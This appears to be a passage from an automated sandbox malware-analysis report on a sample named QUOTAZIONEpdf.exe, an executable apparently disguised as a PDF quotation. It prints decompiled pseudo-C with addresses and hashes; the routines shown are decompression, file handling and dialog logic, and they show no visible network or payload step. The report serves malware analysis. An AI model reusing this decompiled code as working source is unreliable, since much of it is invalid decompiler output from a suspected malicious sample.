                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											_t156 = __ebp - 0x70;
                											 *_t156 =  *(__ebp - 0x70) + 1;
                											__eflags =  *_t156;
                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											while(1) {
                												L48:
                												__eflags = __ebx - 0x100;
                												if(__ebx >= 0x100) {
                													break;
                												}
                												__eax =  *(__ebp - 0x58);
                												__edx = __ebx + __ebx;
                												__ecx =  *(__ebp - 0x10);
                												__esi = __edx + __eax;
                												__ecx =  *(__ebp - 0x10) >> 0xb;
                												__ax =  *__esi;
                												 *(__ebp - 0x54) = __esi;
                												__edi = __ax & 0x0000ffff;
                												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                												__eflags =  *(__ebp - 0xc) - __ecx;
                												if( *(__ebp - 0xc) >= __ecx) {
                													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                													__cx = __ax;
                													_t170 = __edx + 1; // 0x1
                													__ebx = _t170;
                													__cx = __ax >> 5;
                													__eflags = __eax;
                													 *__esi = __ax;
                												} else {
                													 *(__ebp - 0x10) = __ecx;
                													0x800 = 0x800 - __edi;
                													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                													__ebx = __ebx + __ebx;
                													 *__esi = __cx;
                												}
                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                												 *(__ebp - 0x44) = __ebx;
                												if( *(__ebp - 0x10) >= 0x1000000) {
                													continue;
                												} else {
                													goto L46;
                												}
                											}
                											L54:
                											_t173 = __ebp - 0x34;
                											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                											__eflags =  *_t173;
                											goto L55;
                										case 0xf:
                											L58:
                											__eflags =  *(__ebp - 0x6c);
                											if( *(__ebp - 0x6c) == 0) {
                												 *(__ebp - 0x88) = 0xf;
                												goto L170;
                											}
                											__ecx =  *(__ebp - 0x70);
                											__eax =  *(__ebp - 0xc);
                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											_t203 = __ebp - 0x70;
                											 *_t203 =  *(__ebp - 0x70) + 1;
                											__eflags =  *_t203;
                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											L60:
                											__eflags = __ebx - 0x100;
                											if(__ebx >= 0x100) {
                												L55:
                												__al =  *(__ebp - 0x44);
                												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                												goto L56;
                											}
                											L61:
                											__eax =  *(__ebp - 0x58);
                											__edx = __ebx + __ebx;
                											__ecx =  *(__ebp - 0x10);
                											__esi = __edx + __eax;
                											__ecx =  *(__ebp - 0x10) >> 0xb;
                											__ax =  *__esi;
                											 *(__ebp - 0x54) = __esi;
                											__edi = __ax & 0x0000ffff;
                											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                											__eflags =  *(__ebp - 0xc) - __ecx;
                											if( *(__ebp - 0xc) >= __ecx) {
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                												__cx = __ax;
                												_t217 = __edx + 1; // 0x1
                												__ebx = _t217;
                												__cx = __ax >> 5;
                												__eflags = __eax;
                												 *__esi = __ax;
                											} else {
                												 *(__ebp - 0x10) = __ecx;
                												0x800 = 0x800 - __edi;
                												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                												__ebx = __ebx + __ebx;
                												 *__esi = __cx;
                											}
                											__eflags =  *(__ebp - 0x10) - 0x1000000;
                											 *(__ebp - 0x44) = __ebx;
                											if( *(__ebp - 0x10) >= 0x1000000) {
                												goto L60;
                											} else {
                												goto L58;
                											}
                										case 0x10:
                											L109:
                											__eflags =  *(__ebp - 0x6c);
                											if( *(__ebp - 0x6c) == 0) {
                												 *(__ebp - 0x88) = 0x10;
                												goto L170;
                											}
                											__ecx =  *(__ebp - 0x70);
                											__eax =  *(__ebp - 0xc);
                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											_t365 = __ebp - 0x70;
                											 *_t365 =  *(__ebp - 0x70) + 1;
                											__eflags =  *_t365;
                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											goto L111;
                										case 0x11:
                											L69:
                											__esi =  *(__ebp - 0x58);
                											 *(__ebp - 0x84) = 0x12;
                											while(1) {
                												 *(_t613 - 0x54) = _t606;
                												goto L133;
                											}
                										case 0x12:
                											__eflags =  *(__ebp - 0x40);
                											if( *(__ebp - 0x40) != 0) {
                												__eax =  *(__ebp - 0x58);
                												 *(__ebp - 0x84) = 0x13;
                												__esi =  *(__ebp - 0x58) + 2;
                												while(1) {
                													 *(_t613 - 0x54) = _t606;
                													goto L133;
                												}
                											}
                											__eax =  *(__ebp - 0x4c);
                											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                											__ecx =  *(__ebp - 0x58);
                											__eax =  *(__ebp - 0x4c) << 4;
                											__eflags = __eax;
                											__eax =  *(__ebp - 0x58) + __eax + 4;
                											goto L130;
                										case 0x13:
                											__eflags =  *(__ebp - 0x40);
                											if( *(__ebp - 0x40) != 0) {
                												_t469 = __ebp - 0x58;
                												 *_t469 =  *(__ebp - 0x58) + 0x204;
                												__eflags =  *_t469;
                												 *(__ebp - 0x30) = 0x10;
                												 *(__ebp - 0x40) = 8;
                												L144:
                												 *(__ebp - 0x7c) = 0x14;
                												goto L145;
                											}
                											__eax =  *(__ebp - 0x4c);
                											__ecx =  *(__ebp - 0x58);
                											__eax =  *(__ebp - 0x4c) << 4;
                											 *(__ebp - 0x30) = 8;
                											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                											L130:
                											 *(__ebp - 0x58) = __eax;
                											 *(__ebp - 0x40) = 3;
                											goto L144;
                										case 0x14:
                											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                											__eax =  *(__ebp - 0x80);
                											 *(_t613 - 0x88) = _t533;
                											goto L1;
                										case 0x15:
                											__eax = 0;
                											__eflags =  *(__ebp - 0x38) - 7;
                											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                											__al = __al & 0x000000fd;
                											__eax = (__eflags >= 0) - 1 + 0xb;
                											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                											goto L120;
                										case 0x16:
                											__eax =  *(__ebp - 0x30);
                											__eflags = __eax - 4;
                											if(__eax >= 4) {
                												_push(3);
                												_pop(__eax);
                											}
                											__ecx =  *(__ebp - 4);
                											 *(__ebp - 0x40) = 6;
                											__eax = __eax << 7;
                											 *(__ebp - 0x7c) = 0x19;
                											 *(__ebp - 0x58) = __eax;
                											goto L145;
                										case 0x17:
                											L145:
                											__eax =  *(__ebp - 0x40);
                											 *(__ebp - 0x50) = 1;
                											 *(__ebp - 0x48) =  *(__ebp - 0x40);
                											goto L149;
                										case 0x18:
                											L146:
                											__eflags =  *(__ebp - 0x6c);
                											if( *(__ebp - 0x6c) == 0) {
                												 *(__ebp - 0x88) = 0x18;
                												goto L170;
                											}
                											__ecx =  *(__ebp - 0x70);
                											__eax =  *(__ebp - 0xc);
                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											_t484 = __ebp - 0x70;
                											 *_t484 =  *(__ebp - 0x70) + 1;
                											__eflags =  *_t484;
                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											L148:
                											_t487 = __ebp - 0x48;
                											 *_t487 =  *(__ebp - 0x48) - 1;
                											__eflags =  *_t487;
                											L149:
                											__eflags =  *(__ebp - 0x48);
                											if( *(__ebp - 0x48) <= 0) {
                												__ecx =  *(__ebp - 0x40);
                												__ebx =  *(__ebp - 0x50);
                												0 = 1;
                												__eax = 1 << __cl;
                												__ebx =  *(__ebp - 0x50) - (1 << __cl);
                												__eax =  *(__ebp - 0x7c);
                												 *(__ebp - 0x44) = __ebx;
                												while(1) {
                													 *(_t613 - 0x88) = _t533;
                													goto L1;
                												}
                											}
                											__eax =  *(__ebp - 0x50);
                											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                											__eax =  *(__ebp - 0x58);
                											__esi = __edx + __eax;
                											 *(__ebp - 0x54) = __esi;
                											__ax =  *__esi;
                											__edi = __ax & 0x0000ffff;
                											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                											__eflags =  *(__ebp - 0xc) - __ecx;
                											if( *(__ebp - 0xc) >= __ecx) {
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                												__cx = __ax;
                												__cx = __ax >> 5;
                												__eax = __eax - __ecx;
                												__edx = __edx + 1;
                												__eflags = __edx;
                												 *__esi = __ax;
                												 *(__ebp - 0x50) = __edx;
                											} else {
                												 *(__ebp - 0x10) = __ecx;
                												0x800 = 0x800 - __edi;
                												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                												 *__esi = __cx;
                											}
                											__eflags =  *(__ebp - 0x10) - 0x1000000;
                											if( *(__ebp - 0x10) >= 0x1000000) {
                												goto L148;
                											} else {
                												goto L146;
                											}
                										case 0x19:
                											__eflags = __ebx - 4;
                											if(__ebx < 4) {
                												 *(__ebp - 0x2c) = __ebx;
                												L119:
                												_t393 = __ebp - 0x2c;
                												 *_t393 =  *(__ebp - 0x2c) + 1;
                												__eflags =  *_t393;
                												L120:
                												__eax =  *(__ebp - 0x2c);
                												__eflags = __eax;
                												if(__eax == 0) {
                													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                													goto L170;
                												}
                												__eflags = __eax -  *(__ebp - 0x60);
                												if(__eax >  *(__ebp - 0x60)) {
                													goto L171;
                												}
                												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                												__eax =  *(__ebp - 0x30);
                												_t400 = __ebp - 0x60;
                												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                												__eflags =  *_t400;
                												goto L123;
                											}
                											__ecx = __ebx;
                											__eax = __ebx;
                											__ecx = __ebx >> 1;
                											__eax = __ebx & 0x00000001;
                											__ecx = (__ebx >> 1) - 1;
                											__al = __al | 0x00000002;
                											__eax = (__ebx & 0x00000001) << __cl;
                											__eflags = __ebx - 0xe;
                											 *(__ebp - 0x2c) = __eax;
                											if(__ebx >= 0xe) {
                												__ebx = 0;
                												 *(__ebp - 0x48) = __ecx;
                												L102:
                												__eflags =  *(__ebp - 0x48);
                												if( *(__ebp - 0x48) <= 0) {
                													__eax = __eax + __ebx;
                													 *(__ebp - 0x40) = 4;
                													 *(__ebp - 0x2c) = __eax;
                													__eax =  *(__ebp - 4);
                													__eax =  *(__ebp - 4) + 0x644;
                													__eflags = __eax;
                													L108:
                													__ebx = 0;
                													 *(__ebp - 0x58) = __eax;
                													 *(__ebp - 0x50) = 1;
                													 *(__ebp - 0x44) = 0;
                													 *(__ebp - 0x48) = 0;
                													L112:
                													__eax =  *(__ebp - 0x40);
                													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                														_t391 = __ebp - 0x2c;
                														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                														__eflags =  *_t391;
                														goto L119;
                													}
                													__eax =  *(__ebp - 0x50);
                													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                													__eax =  *(__ebp - 0x58);
                													__esi = __edi + __eax;
                													 *(__ebp - 0x54) = __esi;
                													__ax =  *__esi;
                													__ecx = __ax & 0x0000ffff;
                													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                													__eflags =  *(__ebp - 0xc) - __edx;
                													if( *(__ebp - 0xc) >= __edx) {
                														__ecx = 0;
                														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                														__ecx = 1;
                														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                														__ebx = 1;
                														__ecx =  *(__ebp - 0x48);
                														__ebx = 1 << __cl;
                														__ecx = 1 << __cl;
                														__ebx =  *(__ebp - 0x44);
                														__ebx =  *(__ebp - 0x44) | __ecx;
                														__cx = __ax;
                														__cx = __ax >> 5;
                														__eax = __eax - __ecx;
                														__edi = __edi + 1;
                														__eflags = __edi;
                														 *(__ebp - 0x44) = __ebx;
                														 *__esi = __ax;
                														 *(__ebp - 0x50) = __edi;
                													} else {
                														 *(__ebp - 0x10) = __edx;
                														0x800 = 0x800 - __ecx;
                														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                														 *__esi = __dx;
                													}
                													__eflags =  *(__ebp - 0x10) - 0x1000000;
                													if( *(__ebp - 0x10) >= 0x1000000) {
                														L111:
                														_t368 = __ebp - 0x48;
                														 *_t368 =  *(__ebp - 0x48) + 1;
                														__eflags =  *_t368;
                														goto L112;
                													} else {
                														goto L109;
                													}
                												}
                												__ecx =  *(__ebp - 0xc);
                												__ebx = __ebx + __ebx;
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                												 *(__ebp - 0x44) = __ebx;
                												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                													__ecx =  *(__ebp - 0x10);
                													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                													__ebx = __ebx | 0x00000001;
                													__eflags = __ebx;
                													 *(__ebp - 0x44) = __ebx;
                												}
                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                												if( *(__ebp - 0x10) >= 0x1000000) {
                													L101:
                													_t338 = __ebp - 0x48;
                													 *_t338 =  *(__ebp - 0x48) - 1;
                													__eflags =  *_t338;
                													goto L102;
                												} else {
                													goto L99;
                												}
                											}
                											__edx =  *(__ebp - 4);
                											__eax = __eax - __ebx;
                											 *(__ebp - 0x40) = __ecx;
                											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                											goto L108;
                										case 0x1a:
                											L56:
                											__eflags =  *(__ebp - 0x64);
                											if( *(__ebp - 0x64) == 0) {
                												 *(__ebp - 0x88) = 0x1a;
                												goto L170;
                											}
                											__ecx =  *(__ebp - 0x68);
                											__al =  *(__ebp - 0x5c);
                											__edx =  *(__ebp - 8);
                											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                											 *( *(__ebp - 0x68)) = __al;
                											__ecx =  *(__ebp - 0x14);
                											 *(__ecx +  *(__ebp - 8)) = __al;
                											__eax = __ecx + 1;
                											__edx = 0;
                											_t192 = __eax %  *(__ebp - 0x74);
                											__eax = __eax /  *(__ebp - 0x74);
                											__edx = _t192;
                											goto L79;
                										case 0x1b:
                											L75:
                											__eflags =  *(__ebp - 0x64);
                											if( *(__ebp - 0x64) == 0) {
                												 *(__ebp - 0x88) = 0x1b;
                												goto L170;
                											}
                											__eax =  *(__ebp - 0x14);
                											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                											__eflags = __eax -  *(__ebp - 0x74);
                											if(__eax >=  *(__ebp - 0x74)) {
                												__eax = __eax +  *(__ebp - 0x74);
                												__eflags = __eax;
                											}
                											__edx =  *(__ebp - 8);
                											__cl =  *(__eax + __edx);
                											__eax =  *(__ebp - 0x14);
                											 *(__ebp - 0x5c) = __cl;
                											 *(__eax + __edx) = __cl;
                											__eax = __eax + 1;
                											__edx = 0;
                											_t274 = __eax %  *(__ebp - 0x74);
                											__eax = __eax /  *(__ebp - 0x74);
                											__edx = _t274;
                											__eax =  *(__ebp - 0x68);
                											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                											_t283 = __ebp - 0x64;
                											 *_t283 =  *(__ebp - 0x64) - 1;
                											__eflags =  *_t283;
                											 *( *(__ebp - 0x68)) = __cl;
                											L79:
                											 *(__ebp - 0x14) = __edx;
                											goto L80;
                										case 0x1c:
                											while(1) {
                												L123:
                												__eflags =  *(__ebp - 0x64);
                												if( *(__ebp - 0x64) == 0) {
                													break;
                												}
                												__eax =  *(__ebp - 0x14);
                												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                												__eflags = __eax -  *(__ebp - 0x74);
                												if(__eax >=  *(__ebp - 0x74)) {
                													__eax = __eax +  *(__ebp - 0x74);
                													__eflags = __eax;
                												}
                												__edx =  *(__ebp - 8);
                												__cl =  *(__eax + __edx);
                												__eax =  *(__ebp - 0x14);
                												 *(__ebp - 0x5c) = __cl;
                												 *(__eax + __edx) = __cl;
                												__eax = __eax + 1;
                												__edx = 0;
                												_t414 = __eax %  *(__ebp - 0x74);
                												__eax = __eax /  *(__ebp - 0x74);
                												__edx = _t414;
                												__eax =  *(__ebp - 0x68);
                												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                												__eflags =  *(__ebp - 0x30);
                												 *( *(__ebp - 0x68)) = __cl;
                												 *(__ebp - 0x14) = _t414;
                												if( *(__ebp - 0x30) > 0) {
                													continue;
                												} else {
                													L80:
                													 *(__ebp - 0x88) = 2;
                													goto L1;
                												}
                											}
                											 *(__ebp - 0x88) = 0x1c;
                											goto L170;
                									}
                								}
                								L171:
                								_t535 = _t534 | 0xffffffff;
                								goto L172;
                							}
                						}
                					}
                				}
                			}













                0x004063e9
                0x004063ec
                0x004063ef
                0x004063f2
                0x004063f2
                0x004063f2
                0x004063f5
                0x004063f7
                0x004063f7
                0x00000000
                0x00000000
                0x00406639
                0x00406639
                0x00406639
                0x0040663d
                0x00000000
                0x00000000
                0x00406643
                0x00406646
                0x00406649
                0x0040664c
                0x0040664e
                0x0040664e
                0x0040664e
                0x00406651
                0x00406654
                0x00406657
                0x0040665a
                0x0040665d
                0x00406660
                0x00406661
                0x00406663
                0x00406663
                0x00406663
                0x00406666
                0x00406669
                0x0040666c
                0x0040666f
                0x00406672
                0x00406676
                0x00406678
                0x0040667b
                0x00000000
                0x0040667d
                0x004063fa
                0x004063fa
                0x00000000
                0x004063fa
                0x0040667b
                0x004068b0
                0x00000000
                0x00000000
                0x00405edf
                0x004068e7
                0x004068e7
                0x00000000
                0x004068e7
                0x00406734
                0x004066bb
                0x004066b8

                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
                • Instruction ID: 03af6c1e27b970ccc0602dedbaa06cf660f45ac3eaa39f8bc43b8226cdf4d636
                • Opcode Fuzzy Hash: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
                • Instruction Fuzzy Hash: 46715571D00229DFEF28CF98C844BADBBB1FB44305F15806AD816BB281C7789A96DF44
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 69%
                			E00401389(signed int _a4) {
                				intOrPtr* _t6;
                				void* _t8;
                				void* _t10;
                				signed int _t11;
                				void* _t12;
                				signed int _t16;
                				signed int _t17;
                				void* _t18;
                
                				_t17 = _a4;
                				while(_t17 >= 0) {
                					_t6 = _t17 * 0x1c +  *0x423ed0;
                					if( *_t6 == 1) {
                						break;
                					}
                					_push(_t6); // executed
                					_t8 = E00401434(); // executed
                					if(_t8 == 0x7fffffff) {
                						return 0x7fffffff;
                					}
                					_t10 = E0040136D(_t8);
                					if(_t10 != 0) {
                						_t11 = _t10 - 1;
                						_t16 = _t17;
                						_t17 = _t11;
                						_t12 = _t11 - _t16;
                					} else {
                						_t12 = _t10 + 1;
                						_t17 = _t17 + 1;
                					}
                					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                						 *0x42368c =  *0x42368c + _t12;
                						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42368c, 0x7530,  *0x423674), 0);
                					}
                				}
                				return 0;
                			}


                APIs
                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                • Instruction ID: b71ad761f0ea07ecc4e6183a90c0cd8288537aab3e92bb5761005deb6e4a9b1f
                • Opcode Fuzzy Hash: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                • Instruction Fuzzy Hash: 20014431B24210ABE7291B388D08B2A32ADE714315F10423FF801F32F0D678DC028B4C
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 68%
                			E0040575C(CHAR* _a4, long _a8, long _a12) {
                				signed int _t5;
                				void* _t6;
                
                				_t5 = GetFileAttributesA(_a4); // executed
                				asm("sbb ecx, ecx");
                				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                				return _t6;
                			}






                APIs
                • GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\user\Desktop\QUOTAZIONEpdf.exe,80000000,00000003), ref: 00405760
                • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782
                Similarity
                • API ID: File$AttributesCreate
                • String ID:
                • API String ID: 415043291-0
                • Opcode ID: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                • Instruction ID: 90a47e22fdd321f70bf06df01bfdefa11f3e73682391c7296034eb3a8fe04f39
                • Opcode Fuzzy Hash: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                • Instruction Fuzzy Hash: 8CD09E31658301AFEF098F20DD1AF2E7AA2EB84B00F10562CB646940E0D6715815DB16
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040573D(CHAR* _a4) {
                				signed char _t3;
                
                				_t3 = GetFileAttributesA(_a4); // executed
                				if(_t3 != 0xffffffff) {
                					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
                				}
                				return _t3;
                			}





                APIs
                • GetFileAttributesA.KERNELBASE(?,00405548,?,?,?), ref: 00405741
                • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405753
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                • Instruction ID: 88d4634cff9a4ddd1fee40d2dea465eb4d792ab4199cb35d7d0d1e1f6e6e1bf9
                • Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                • Instruction Fuzzy Hash: CAC04CB1808501EBD6016B24DF0D81F7B66EB50321B108B35F569E00F0C7755C66EA1A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004031A8(void* _a4, long _a8) {
                				int _t6;
                				long _t10;
                
                				_t10 = _a8;
                				_t6 = ReadFile( *0x409010, _a4, _t10,  &_a8, 0); // executed
                				if(_t6 == 0 || _a8 != _t10) {
                					return 0;
                				} else {
                					return 1;
                				}
                			}






                APIs
                • ReadFile.KERNELBASE(00409128,00000000,00000000,00000000,00413038,0040B038,004030AD,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000), ref: 004031BF
                Similarity
                • API ID: FileRead
                • String ID:
                • API String ID: 2738559852-0
                • Opcode ID: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                • Instruction ID: b8f1ad64850fa721b7c3123cc302f733781f6218d307da9d2aa6486ecc23217a
                • Opcode Fuzzy Hash: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                • Instruction Fuzzy Hash: 4BE08632254119BBCF105E619C00AD73F5CEB0A3A2F008432FD55E9190D230EA11DBA5
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004031DA(long _a4) {
                				long _t2;
                
                				_t2 = SetFilePointer( *0x409010, _a4, 0, 0); // executed
                				return _t2;
                			}





                APIs
                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,?), ref: 004031E8
                Similarity
                • API ID: FilePointer
                • String ID:
                • API String ID: 973152223-0
                • Opcode ID: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                • Instruction ID: 0cdacc43d416a0c3c320ce55ce8d4373a9ea66752a7e2c64ddc4eeaf6ba3fa4d
                • Opcode Fuzzy Hash: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                • Instruction Fuzzy Hash: 49B01271644200BFDA214F00DF05F057B31B790700F108430B394380F082712420EB0D
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                C-Code - Quality: 95%
                			E00404F61(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                				struct HWND__* _v8;
                				long _v12;
                				struct tagRECT _v28;
                				void* _v36;
                				signed int _v40;
                				int _v44;
                				int _v48;
                				signed int _v52;
                				int _v56;
                				void* _v60;
                				void* _v68;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				long _t87;
                				unsigned int _t92;
                				int _t94;
                				int _t95;
                				void* _t101;
                				intOrPtr _t112;
                				intOrPtr _t123;
                				struct HWND__* _t127;
                				int _t149;
                				int _t150;
                				struct HWND__* _t154;
                				struct HWND__* _t158;
                				struct HMENU__* _t160;
                				long _t162;
                				void* _t163;
                				short* _t164;
                
                				_t154 =  *0x423684;
                				_t149 = 0;
                				_v8 = _t154;
                				if(_a8 != 0x110) {
                					if(_a8 == 0x405) {
                						CloseHandle(CreateThread(0, 0, E00404EF5, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                					}
                					if(_a8 != 0x111) {
                						L17:
                						if(_a8 != 0x404) {
                							L25:
                							if(_a8 != 0x7b || _a12 != _t154) {
                								goto L20;
                							} else {
                								_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
                								_a8 = _t87;
                								if(_t87 <= _t149) {
                									L37:
                									return 0;
                								}
                								_t160 = CreatePopupMenu();
                								AppendMenuA(_t160, _t149, 1, E00405AA7(_t149, _t154, _t160, _t149, 0xffffffe1));
                								_t92 = _a16;
                								if(_t92 != 0xffffffff) {
                									_t150 = _t92;
                									_t94 = _t92 >> 0x10;
                								} else {
                									GetWindowRect(_t154,  &_v28);
                									_t150 = _v28.left;
                									_t94 = _v28.top;
                								}
                								_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
                								_t162 = 1;
                								if(_t95 == 1) {
                									_v60 = _t149;
                									_v48 = 0x420498;
                									_v44 = 0xfff;
                									_a4 = _a8;
                									do {
                										_a4 = _a4 - 1;
                										_t162 = _t162 + SendMessageA(_v8, 0x102d, _a4,  &_v68) + 2;
                									} while (_a4 != _t149);
                									OpenClipboard(_t149);
                									EmptyClipboard();
                									_t101 = GlobalAlloc(0x42, _t162);
                									_a4 = _t101;
                									_t163 = GlobalLock(_t101);
                									do {
                										_v48 = _t163;
                										_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
                										 *_t164 = 0xa0d;
                										_t163 = _t164 + 2;
                										_t149 = _t149 + 1;
                									} while (_t149 < _a8);
                									GlobalUnlock(_a4);
                									SetClipboardData(1, _a4);
                									CloseClipboard();
                								}
                								goto L37;
                							}
                						}
                						if( *0x42366c == _t149) {
                							ShowWindow( *0x423ea8, 8);
                							if( *0x423f2c == _t149) {
